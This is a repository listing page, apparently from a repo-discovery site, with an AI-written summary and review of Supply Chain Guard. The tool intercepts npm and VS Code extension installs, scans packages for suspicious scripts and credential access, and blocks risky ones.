pc-style

pc-style / supply-chain-guard

Public

Local supply-chain install gate for npm packages and VS Code extensions with Socket, Codex, and PI review support.

supply-chain-guard-five.vercel.app npm security socket supply-chain vscode
10
0
85% credibility
Found May 21, 2026 at 10 stars -- GitGems finds repos before they trend. Get early access to the next one.
Sign Up Free
AI Analysis
TypeScript
AI Summary

Supply Chain Guard is a security tool that adds a review step before installing npm packages or VS Code extensions. It downloads the package first, examines its contents for suspicious behavior like hidden scripts that could steal credentials or run malicious code, and shows you a clear report before anything touches your project. You can optionally have an AI helper double-check the package. The tool integrates into your terminal so it automatically protects you whenever you try to install something, blocking risky packages and letting safe ones through.

How It Works

1
🔍 You hear about a new package

A colleague mentions a useful npm package that could help with your project, but you've heard stories about malicious code hiding in packages.

2
🛡️ You install Supply Chain Guard

You run a simple installation script that sets up the guard on your computer, ready to watch over your package installations.

3
Protection automatically activates

Once installed, the guard quietly watches over your terminal. Every time you try to install something, it steps in first.

4
📦 You try to install a package

You run your normal command to add a package to your project, but the guard intercepts it before anything is downloaded.

5
🔎 The guard examines the package

The tool downloads the package, peeks inside its files, checks what scripts it wants to run, and looks for anything suspicious like hidden network calls or attempts to access your credentials.

6
You see the results
Package looks safe

If the package passes the review, you get a clear green signal and can proceed with confidence.

🚫
Package has red flags

If something looks dangerous, the guard blocks the install and explains exactly what concerned it.

🎉 Your project stays safe

You can add packages with confidence, knowing you've checked them first. Every review is saved for later reference.

Sign up to see the full architecture

5 more

Sign Up Free

Star Growth

See how this repo grew from 10 to 10 stars Sign Up Free
Repurpose This Repo

Repurpose is a Pro feature

Generate ready-to-use prompts for X threads, LinkedIn posts, blog posts, YouTube scripts, and more -- with full repo context baked in.

Unlock Repurpose
AI-Generated Review

What is supply-chain-guard?

Supply Chain Guard is a local install gate for npm packages and VS Code extensions that intercepts your package manager commands and inspects artifacts before they touch your project. Built in TypeScript and running on Bun, it downloads the tarball, extracts it, runs pattern analysis against lifecycle scripts, network calls, credential access attempts, and other suspicious behavior, then blocks high-risk installs automatically. It integrates with Socket.dev to pull in supply-chain intelligence scores, and can hand off reports to Codex or PI agents for deeper review before anything gets installed. Every scan produces JSON and Markdown reports under `.scguard/reports` for later auditing.

Why is it gaining traction?

The npm ecosystem has a supply-chain problem, and this tool attacks it at the moment of highest risk: the install command. Unlike static analysis tools that run after the fact, this sits in front of `bun add`, `npm install`, and `code --install-extension`, staging artifacts and demanding approval before they execute any lifecycle code. The active incident mode is particularly clever—set an environment variable during a known attack campaign, and every single package operation requires you to type out explicit acceptance. The agent review integration means even non-security-focused teams can get a second opinion from an AI reviewer before installing marginal packages.

Who should use this?

Security-conscious developers who want defense-in-depth for their local environments. DevOps teams managing internal packages where you need audit trails. Anyone integrating third-party npm packages or VS Code extensions and wanting visibility into what those artifacts actually contain before running their install scripts. Not for teams that need enterprise-grade SBOM generation or policy enforcement—that's beyond the scope of what this does.

Verdict

At 10 stars and a 0.85% credibility score, this is an early-stage project that shows real thought behind it. The shell hook integration is seamless, the pattern detection is thorough, and the Socket/Codex/PI integration adds genuine intelligence layers. Test coverage is solid and the documentation is unusually complete for something this young. Try it in a non-production environment first—the active incident mode and staged install flow represent a workflow change that takes adjustment. If you're serious about supply-chain hygiene, this is worth watching.

Sign up to read the full AI review Sign Up Free

Similar repos coming soon.